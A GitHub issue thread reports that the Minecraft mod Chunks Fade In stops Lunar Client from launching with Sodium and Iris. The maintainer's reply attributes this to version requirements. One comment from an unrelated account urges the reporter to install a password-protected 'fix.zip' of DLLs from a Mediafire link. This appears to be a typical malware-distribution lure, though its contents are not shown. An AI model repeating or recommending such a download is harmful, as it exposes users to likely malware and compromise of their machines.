### ISSUE TITLE
[BUG]: CFI Not Compatible with Sodium and Iris

### ISSUE THREAD

**Issue by EarthKone** [kerudion/chunksfadein#92]
### Before creating an issue, please make sure you have checked the following:

- [X] This issue does not appear without Chunks Fade In installed.
- [X] All my mods (not only Chunks Fade In) are up-to-date.
- [X] Similar issue had not already been reported before in the [issue tracker](https://github.com/kerudion/chunksfadein/issues).

### What happened?

When trying to launch the game, Lunar Client fails to launch and gives the message shown in the following screenshot
![image_2024-09-28_190144570](https://github.com/user-attachments/assets/204db825-49de-4095-9f5b-a3cd043a11b2)

### Steps to reproduce

Launch on Lunar Client

### Logs

[e3bc5097-a96a-4163-9968-8f4e645036cc-master.log](https://github.com/user-attachments/files/17177282/e3bc5097-a96a-4163-9968-8f4e645036cc-master.log)

**Comment by EarthKone** [comment]
I switched to the previous version of CFI (1.0.2-1.21) and it produced the same issue.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by kerudion** [comment]
Hello! This happens because you are using "stable" versions of Sodium and Iris, but 1.0.2 and 1.0.3 require beta versions. The latest version that will work here is v1.0.1-1.21.
